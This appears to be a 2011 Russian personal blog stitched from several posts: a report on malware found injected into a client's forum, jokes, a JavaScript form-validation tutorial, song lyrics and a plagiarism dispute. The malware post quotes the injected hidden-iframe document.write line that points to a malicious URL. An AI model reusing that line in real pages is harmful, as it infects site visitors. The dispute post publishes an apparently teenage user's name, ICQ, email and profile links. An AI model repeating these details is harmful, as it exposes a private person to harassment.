Итак, сегодня нашел вирусный код на форуме заказчика, замечу что нашли мы его не сразу, поэтому наши поиски были даже в какой то мере интересны, итак на начальном этапе мы имели форум на IPB и доступ к нему через фтп(по защищенным протоколам и firewall с правилами по IP). Так же имелись жалобы со стороны пользователей на появляющиеся сообщения о вирусах.
Проверка несколькими антивирусами показала, что Kaspersky, Avast, и даже NOD32 - видят вредоносные ссылки, в свою очередь к сожалению Avira их не увидела =\\

javascript в файлах с маской *global*.js

document.write('<i'+'frame sr'+'c="http://filtrated.in/wu5y3/07.php" width="0" height="0" frameborder="0">'+'</'+'ifram'+'e>');

скриншот


инфицированная ссылка типа *.in/topic.php?b=486def4

Замечен в интернете 8 мая 2011 года

Психологический тест оптимиста.

Психолог:

— У вас умер дедушка.

Оптимист:

— А у меня еще один есть.

— И вы опаздываете на похороны.

— А я сяду в машину и по газам.

— Нет, вы боитесь ездить за рулем.

— А я выпью для храбрости бутылку водки.

— Вот! И вас, пьяного, останавливает ГАИшник.

— А я договорюсь.

— Не договоритесь — это женщина.

— А я познакомлюсь.

— Но она страшная.

— А я-то уже пьяный!

— Знаешь, когда «я не против!» сходит за правду? Когда человек орет и плюется…
"Друзья"

— Может сегодня пойти к ней и почистить ковёр?
— Тебе не кажется, что это уже перебор?
— ДА! Ради Бога, мне что надо показывать табличку «Сарказм» каждый раз, когда я открываю рот?
— У тебя есть табличка «Сарказм»?
"Теория большого взрыва"

Хаус (пациенту Скорой помощи): — Профессиональная спортивная травма?
Пациент: — Вообще-то я не…
Хаус: … не знакомы с понятием «сарказм»? Не волнуйтесь, это новый термин.
"Доктор Хаус"

Cтою я на кухне… Попиваю чаек… Темно ночь… И мне на душе так хорошо… Возьми да и ляпни «Пиздато». Папа за спиной откашлялся и заявил «Ага. Заебись! Иди cпать.»

В жизни есть два вида депрессии: весенняя — «Меня никто не любит» и осенняя «Да пошли вы все на @уй!»

…Бывают такие замечательные люди, мимо которых невозможно пройти. Так и хочется остановиться и дать в морду…

Иногда надо имитировать крушение корабля… чтобы с него сбежали крысы…

«Я лечу раны» — сказало Время. «Я окрыляю» — возразило Счастье. «А я раню, поднимаю до небес, а потом швыряю на землю» — коварно усмехнулась Любовь…

Не говори о себе плохо -- не делай за других их роботу.

Итак, разберу проверки на js для себя и для тех кому будет это интересно.
Данные методы проверки работают в FF, Opera, IE8 (в остальных не проверял).

Предположим что у нас есть форма, которая должна отправлять введенные данные на страницу reg.php методом POST с полями:
1. "Имя" (Обязательное поле, проверка на длину имени, допустим это будет минимум 2 символа)
2. "Телефон" (Запрет на ввод букв и символов, разрешим вводить только цифры, ну и использовать клавишу "Backspace" для стирания написанных символов, проверка на длину номера - минимум 9 цифр)
3. "E-mail" (Обязательное поле, проверка по маске)
4. "Пароль" (Обязательное поле, проверка на длину пароля, возьмем по стандарту 6 символов)
5. "Повтор пароля" (Обязательное поле, проверка что данные из этого поля совпадают с данными в поле "Пароль")
6. Checkbox "Согласен с правилами регистрации" (Флажок обязательно должен быть отмечен пользователем)
7. Кнопка "Зарегистрироваться" (При нажатии на кнопку проверяется форма и в случае успешной проверки производится отправка данных, иначе показывает ошибку с указанием на требования при заполнении определенного поля)

Изначальная форма в html будет выглядеть примерно так:
<form name="form" action="reg.php" method="post">
Имя*:<br/><input type="text" name="name" id="name"/><br/>
Телефон:<br/><input type="text" name="phone" id="phone"/><br/>
E-mail*:<br/><input type="text" name="email" id="email"/><br/>
Пароль*:<br/><input type="password" name="password" id="password"/><br/>
Повтор пароля*:<br/><input type="password" name="password1" id="password1"/><br/>
<input type="checkbox" name="consent" id="consent"/>Согласен с правилами регистрации*<br/>
<input type="submit" value="Зарегистрироваться"/>
</form>

Чтобы запустить проверку формы при нажатии на кнопку "Зарегистрироваться" добавим в тег form событие при нажатии submit, которое мы назовем valid_form
<form name="form" action="reg.php" method="post" onsubmit="return valid_form();">
...

Добавим в поле "Телефон" событие реагирующее на нажатие клавиши, которое будет проверять цифру вводят или нет, назовем его valid_key_number
...
Телефон:<br/><input type="text" name="phone" id="phone" onkeypress="return valid_key_number(event);"/><br/>
...

C формой мы закончили, теперь приступим к написанию javascript'а, который собственно и будет выполнять все проверки.
Создадим функцию valid_form, которая будет отвечать за проверку формы после нажатия кнопки регистрации, а так же введем в ней переменную valid, которая будет решать отправить форму или же выдать ошибку:
<script type="text/javascript">
function valid_form(){
 valid=true;
 ...
 return valid;
}
</script>

1.1 Поле "Имя" должно быть заполнено поэтому проверим чтобы поле было не пустым, и если оно пустое выдаем ошибку и прерываем отправку формы.
if(document.getElementById("name").value==""){
 alert("Пожалуйста заполните поле 'Имя'.");
 valid=false;
}

1.2 Поле "Имя" должно состоять из не менее чем двух символов, поэтому вводим дополнительную проверку.
if(document.getElementById("name").value.length<2){
 alert("Имя слишком короткое.");
 valid=false;
}

2. Поле "Телефон" должно состоять из не менее чем девяти символов - вводим проверку на длинну (запрет на ввод символов и букв мы введем чуть позже в функции valid_key_number).
if(document.getElementById("phone").value.length<9&&document.getElementById("phone").value!=""){
 alert("Номер телефона слишком короткий.");
 valid=false;
}

3.1. Поле "E-mail" обязательно - вводим проверку.
if(document.getElementById("email").value==""){
 alert("Пожалуйста заполните поле 'E-mail'.");
 valid=false;
}

3.2. Вводим проверку поля E-mail по маске, чтобы определить введен email или же набор символов.
if(document.getElementById("email").value.match(/^\w+(['\.\-\+]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,})+$/)==null){
 alert("Неверный E-mail адрес.");
 valid=false;
}

4.1 Поле "Пароль" обязательно - вводим проверку.
if(document.getElementById("password").value==""){
 alert("Пожалуйста заполните поле 'Пароль'.");
 valid=false;
}

4.2 Поле "Пароль" должно состоять из не менее чем шести символов, поэтому вводим дополнительную проверку.
if(document.getElementById("password").value.length<6){
 alert("Пароль слишком короткий.");
 valid=false;
}

5.1 Поле "Повтор пароля" обязательно - вводим проверку.
if(document.getElementById("password1").value==""){
 alert("Пожалуйста заполните поле 'Повтор пароля'.");
 valid=false;
}

5.1 Проверяем совпадают ли поля "Пароль" и "Повтор пароля".
if(document.getElementById("password").value!=document.getElementById("password1").value){
 alert("Поля 'Пароль' и 'Повтор пароля' не совпадают.");
 valid=false;
}

6 Флажок "Согласен с правилами регистрации" должен быть отмечен - вводим проверку.
if(document.getElementById("consent").checked==false){
 alert("Чтобы зарегистрироваться необходимо согласиться с правилами.");
 valid=false;
}

Теперь объединим все эти проверки в функцию valid_form.
<script type="text/javascript">
function valid_form(){
 valid=true;
 if(document.getElementById("name").value==""){
  alert("Пожалуйста заполните поле 'Имя'.");
  valid=false;
 }else{
  if(document.getElementById("name").value.length<2){
   alert("Имя слишком короткое.");
   valid=false;
  }else{
   if(document.getElementById("phone").value.length<9&&document.getElementById("phone").value!=""){
    alert("Номер телефона слишком короткий.");
    valid=false;
   }else{
    if(document.getElementById("email").value==""){
     alert("Пожалуйста заполните поле 'E-mail'.");
     valid=false;
    }else{
     if(document.getElementById("email").value.match(/^\w+(['\.\-\+]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,})+$/)==null){
      alert("Неверный E-mail адрес.");
      valid=false;
     }else{
      if(document.getElementById("password").value==""){
       alert("Пожалуйста заполните поле 'Пароль'.");
       valid=false;
      }else{
       if(document.getElementById("password").value.length<6){
        alert("Пароль слишком короткий.");
        valid=false;
       }else{
        if(document.getElementById("password1").value==""){
         alert("Пожалуйста заполните поле 'Повтор пароля'.");
         valid=false;
        }else{
         if(document.getElementById("password").value!=document.getElementById("password1").value){
          alert("Поля 'Пароль' и 'Повтор пароля' не совпадают.");
          valid=false;
         }else{
          if(document.getElementById("consent").checked==false){
           alert("Чтобы зарегистрироваться необходимо согласиться с правилами.");
           valid=false;
          }
         }
        }
       }
      }
     }
    }
   }
  }
 }
 return valid;
}
</script>

Напишем функцию valid_key_number, которая будет проверять нажатые клавиши в поле "Телефон" и разрешать нажатие лишь цифр (код клавиш от 48 до 57) и нажатие Backspace (код клавиши - 8).
function valid_key_number(e){
 e = (e) ? e : window.e;
 w = (e.keyCode) ? e.keyCode : e.which;
 if((w<48||w>57)&&w!=8) return false;
}

Итак, вот и все. Теперь соберем все что у нас есть и получим форму с разными проверками полей
<script type="text/javascript">
function valid_form(){
 valid=true;
 if(document.getElementById("name").value==""){
  alert("Пожалуйста заполните поле 'Имя'.");
  valid=false;
 }else{
  if(document.getElementById("name").value.length<2){
   alert("Имя слишком короткое.");
   valid=false;
  }else{
   if(document.getElementById("phone").value.length<9&&document.getElementById("phone").value!=""){
    alert("Номер телефона слишком короткий.");
    valid=false;
   }else{
    if(document.getElementById("email").value==""){
     alert("Пожалуйста заполните поле 'E-mail'.");
     valid=false;
    }else{
     if(document.getElementById("email").value.match(/^\w+(['\.\-\+]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,})+$/)==null){
      alert("Неверный E-mail адрес.");
      valid=false;
     }else{
      if(document.getElementById("password").value==""){
       alert("Пожалуйста заполните поле 'Пароль'.");
       valid=false;
      }else{
       if(document.getElementById("password").value.length<6){
        alert("Пароль слишком короткий.");
        valid=false;
       }else{
        if(document.getElementById("password1").value==""){
         alert("Пожалуйста заполните поле 'Повтор пароля'.");
         valid=false;
        }else{
         if(document.getElementById("password").value!=document.getElementById("password1").value){
          alert("Поля 'Пароль' и 'Повтор пароля' не совпадают.");
          valid=false;
         }else{
          if(document.getElementById("consent").checked==false){
           alert("Чтобы зарегистрироваться необходимо согласиться с правилами.");
           valid=false;
          }
         }
        }
       }
      }
     }
    }
   }
  }
 }
 return valid;
}
function valid_key_number(e){
 e = (e) ? e : window.e;
 w = (e.keyCode) ? e.keyCode : e.which;
 if((w<48||w>57)&&w!=8) return false;
}
</script>
<form name="form" action="reg.php" method="post" onsubmit="return valid_form();">
Имя*:<br/><input type="text" name="name" id="name"/><br/>
Телефон:<br/><input type="text" name="phone" id="phone" onkeypress="return valid_key_number(event);"/><br/>
E-mail*:<br/><input type="text" name="email" id="email"/><br/>
Пароль*:<br/><input type="password" name="password" id="password"/><br/>
Повтор пароля*:<br/><input type="password" name="password1" id="password1"/><br/>
<input type="checkbox" name="consent" id="consent"/>Согласен с правилами регистрации*<br/>
<input type="submit" value="Зарегистрироваться"/>
</form>

Посмотреть как работает данный код можно ТУТ.
Надеюсь вам пригодится данная статья.
При копировании статьи не забывайте оставлять ссылку на данную страницу.

56 слушали 0 копий [+ в свой плеер]

Аниме: Fate Stay Night

Давно не писал, наверно просто не чего было написать. Но вроде бы что то наскребается)

На улице проступает свет сквозь тучи, опять похоже солнца сегодня не увидим... Надеюсь что все же это не помешает всем моим планам.

1. Песенка которую только что нашел в просторах интернета



Tainaka Sachi - Kirameku Namida Wa Hoshi Ni
Kirameku namida wa hoshi ni
Kaze ni nori sora wo kazaru
Tsukiakari kumo ni togiretemo
Boku wo terasu

Massugu na reeru ga iyade
Yamikumo ni kakedashita
Akirame wo ketsui ni kae te
Surihetta kakato hokoru
Michi wa tsuzuku nishi e higashi e
Hi wa shi zundemo

Kirameku namida wa hoshi ni
Kaze ni nori sora wo kazaru
Tsukiakari kumo ni togiretemo
Boku wo terasu

Koremadeto taore kon de
Kuyashisa ni furue temo
Kogetsuita shatsu wo nuge ba
Hadaka no jibun no kagayaki shiru
Uta wa hibiku umi no kanata e
Koe wa kare temo

Kirameku namida wa niji ni
Azayaka na hashi wo kakeru
Kurai mori mayoi tsuzuke temo
Asu wo sasu

Kirameku namida wa hoshi ni
Nagare yuki negai hakobu
Tachi domari sou na boku tsuki ugokasu kibou
Kirameku namida wa hoshi ni
Kaze ni nori sora wo kazaru
Tsukiakari kumo ni togiretemo
Boku wo terasu

2. Нашел таки дизайнера в свою студию(по крайне мере надеюсь...) - ожидаю от него выполнения первого заказа.
Придумал студии логотип, приятно осознавать что в его создании немного поучаствовал дорогой мне человечек) Вот такой вот он получился))


3. Рад нагрузкам с работы №1, быстрой разработке CMS на работе №2, если все так пойдет то циферки скоро придется поменять местами ^^"

[Wed Mar 9 2011 07:22:44 PM] Arengin: Доброго времени суток
[Wed Mar 9 2011 07:22:58 PM] AMON: AMON (648515760) не в сети
[Wed Mar 9 2011 07:22:58 PM] AMON: Пользователь AMON добавил вас в свои контакты.
[Wed Mar 9 2011 07:22:47 PM] AMON:
Вам тоже привет!

[Wed Mar 9 2011 07:22:51 PM] AMON:
Что интересует?

[Wed Mar 9 2011 07:24:03 PM] Arengin: Вам не кажется что не хорошо делать плагиат на авторские скрипты?
[Wed Mar 9 2011 07:24:36 PM] AMON:
Не понял вас? Что за скрипты и что за плагин?

[Wed Mar 9 2011 07:26:31 PM] Arengin: Мод "Оплата за сообщения" для Ucoz была подвержена вами изменениям нарушающим авторские права
[Wed Mar 9 2011 07:27:57 PM] AMON:
Я всё таки не до конча вас понял! Да я использовал этот скрипт для своего форума, но не чего там я не менял!

[Wed Mar 9 2011 07:29:37 PM] Arengin: добавлена запись к каждому скрину clickfamily.ucoz.ru, а так же изменено авторство http://www.topsmiling.ru/index.php?option=com_cont...c-ucoz&catid=19:web-&Itemid=26
[Wed Mar 9 2011 07:30:05 PM] AMON:
и?

[Wed Mar 9 2011 07:32:45 PM] Arengin: Вы понимаете что вы нарушаете авторские права на данный мод? данное нарушение преследуется по законодательству РФ.
[Wed Mar 9 2011 07:33:44 PM] AMON:
а там было где ни будь написанно что так делать нельзя?

[Wed Mar 9 2011 07:33:53 PM] AMON:
Обычно такое указывается...

[Wed Mar 9 2011 07:34:42 PM] AMON:
А поскольку я там не чего не видел и хотел помочь людям кто возможно что то не понял я и попросил исправить этот файл

[Wed Mar 9 2011 07:38:09 PM] Arengin: Предупреждаю Вас и настоятельно прошу убрать все ваши изменения в данном моде, а так же указать автора мода. В противном случае могут быть неприятные для Вас последствия.
[Wed Mar 9 2011 07:38:58 PM] AMON:
хорошо, мне пофегу на этот скрипт, но какая вам разница что если кто то не поймёт как устанавливать его, задаст вопрос именно вам?

[Wed Mar 9 2011 07:39:48 PM] AMON:
Вы тут?

[Wed Mar 9 2011 07:41:32 PM] Arengin: я всячески пресекаю плагиат со стороны пользователей
[Wed Mar 9 2011 07:42:45 PM] Arengin: проконсультировать по поводу установки мода я в состоянии, все таки данный мод именно я написал, а не Вы.
[Wed Mar 9 2011 07:43:36 PM] AMON:
ладно, не переживайте. Я исправлю. Дайте асю и мыло!
Только сейчас я очень занят (примерно дня на 3) как буду свободен перезалью файл!

[Wed Mar 9 2011 07:43:38 PM] AMON:
ок?

[Wed Mar 9 2011 07:46:39 PM] Arengin: Извините, но я не могу дать вам времени больше 24 часов, т.к вы являетесь распространителем нарушающим авторские права.
[Wed Mar 9 2011 07:46:46 PM] AMON:
ок

[Wed Mar 9 2011 07:47:09 PM] AMON:
Пока

[Wed Mar 9 2011 07:47:13 PM] AMON:
простите если чё

[Wed Mar 9 2011 07:48:28 PM] Arengin: ничего, только учтите на будущее.


Помоему неплохо получилось, как оказалось парнишке 15 лет всего, сильно пугать не стал ^^"
Идея только в том чтобы такие как он хотя бы немного уважали чужой труд...

Решил побродить в просторах интернета в поисках своего ранее написанного мода, очень забавно)

Кусочки истории распространения мода в сети Интернет:

11.01.2010
isucoz.com - видимо тут должен быть "исправленный" архив NEXTIK'ом (первым нубо-плагиатером)... но...

16.01.2010
ofucoz.3dn.ru - тоже должен быть "исправленный" архив NEXTIK'ом...
Ваааа мне это нравится - ссылка уходящая в цикл!!! Нажал раз 7 прежде чем остановился... мне нра ^^"

21.02.2010
o-ucoze.ru - мод на хорошем сайте о юкозе, Скачивать могут только зарегистрированые пользователи.
Тестировать не стал.. поленился)

25.02.2010
savior.ucoz.ru - при скачивании архивчика увидел мной написанные строчки от и до + 2 песни New Stories (Highway Blues).wma и Beethoven's Symphony No. 9 (Scherzo).wma добавленных судя по всему для веса.
Savior, если ты когда либо прочтешь эту запись - я искренне уважаю тебя за попытки заработка в интернете и за уважение проделанной мной работы при написании данного скрипта.

25.03.2010
script-ucoz.ucoz.org - вставили инструкцию, даже с картинками... но не заработает - код криво вставили...

22.09.2010
softodrom.at.ua - ни по одной ссылке не скачивается, "Такого файла не существует или он был удален из-за нарушения авторских прав."
Интересно, он не пользовался спросом или что то внутри было совсем не то?)

26.01.2011
topsmiling.ru - "исправленный" архив - добавлена запись к каждому скрину clickfamily.ucoz.ru, а так же изменено авторство.
Тадам! 2й нубо-плагиатер!

17.02.2011
1vitavet.ru - Инструкция без изображений с ссылочкой на пример форума.
Как приятно что у людей есть "прямые руки") Vita, за что тебе отдельное спасибо, жаль только моего авторства не указали, ну да не страшно..

Нашел несколько форумов на которых стоит мой мод ^^":

we-b.3dn.ru
dailysims.ru
wmr-moneys.ucoz.ru

Нубо-плагиатеры:

NEXTIK... дело было давненько.. после того, как он "исправил" мой архив - на многих сайтах я разместил объявлние о том что мод ему не пренадлежит - многие администраторы учли мое сообщение и исправили авторство(что было приятно).
Вскоре я связался с NEXTIK'ом..
В момент разговора он утверждал что мод именно его, он сам его придумал(ага.. и скрины почему то мои и на скринах мой ник как администратора, и что за моды я собирался выпустить он не в курсе).. Я его припугнул судом и прочим прочим и о чудо - сейчас NEXTIK пропал с просторов интернета как нубо-плагиатер моего скрипта, на бывшем его сайте висит надпись "HACKED! Хостинг от uCoz".
Испугался?
В принципе приятно удивлен..)
Быть может он исправился?) Я очень надеюсь на это)

AMON
Омар Аль-рифаи
ICQ: 648515760
email: amon-shop@mail
Сайты: clickfamily.ucoz.ru, topsmiling.ru
http://vkontakte.ru/id109106551
http://wmforum.net.ru/index.php?showuser=49873
Его благодарят, но все же сплошь и рядом имеет отрицательную репутацию, хотя мод он все таки смог мой поставить biznes-forum.ucoz.ru(сейчас он вроде как его кому то продал), а так же clickfamily.ucoz.ru
P.S. - читаем правила форума - ми плакаль... сколько "грамотности" и официальности...

Чтож в ближайшее время я хочу с ним пообщаться) Чуть позже выложу историю общения)

Продолжение следует...

Змей (Чикчан)

Кто Вы по гороскопу Майя